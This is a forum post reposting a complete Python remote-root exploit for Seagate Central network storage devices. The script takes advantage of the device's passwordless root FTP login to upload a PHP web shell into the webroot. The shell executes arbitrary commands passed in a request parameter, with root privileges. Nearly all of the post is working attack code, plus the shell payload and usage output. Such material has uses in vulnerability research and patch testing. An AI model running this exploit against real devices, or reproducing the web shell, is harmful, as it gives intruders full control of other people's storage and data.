Jump to content

Recommended Posts


#!/usr/bin/python
# seagate_ftp_remote_root.py
#
# Seagate Central Remote Root Exploit
#
# Jeremy Brown [jbrown3264/gmail]
# May 2015
#
# -Synopsis-
#
# Seagate Central by default has a passwordless root account (and no option to change it).
# One way to exploit this is to log into it's ftp server and upload a php shell to the webroot.
# From there, we can execute commands with root privileges as lighttpd is also running as root.
#
# -Fixes-
#
# Seagate scheduled it's updates to go live on April 28th, 2015.
#
# Tested Firmware Version: 2014.0410.0026-F
#

import sys
from ftplib import FTP

port = 21

php_shell = """
<?php
if(isset($_REQUEST['cmd']))
{
$cmd = ($_REQUEST["cmd"]);
echo "<pre>$cmd</pre>";
system($cmd);
}
?>
"""

php_shell_filename = "shell.php"
seagate_central_webroot = "/cirrus/"

def main():
if(len(sys.argv) < 2):
print("Usage: %s <host>" % sys.argv[0])
return

host = sys.argv[1]

try:
with open(php_shell_filename, 'w') as file:
file.write(php_shell)

except Exception as error:
print("Error: %s" % error);
return

try:
ftp = FTP(host)
ftp.login("root")
ftp.storbinary("STOR " + seagate_central_webroot + php_shell_filename, open(php_shell_filename, 'rb'))
ftp.close()

except Exception as error:
print("Error: %s" % error);
return

print("Now surf on over to http://%s%s%s for the php root shell" % (host, seagate_central_webroot, php_shell_filename))

return

if __name__ == "__main__":
main()

Sursa > https://dl.packetstormsecurity.net/1506-exploits/seagate_ftp_remote_root.py.txt

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...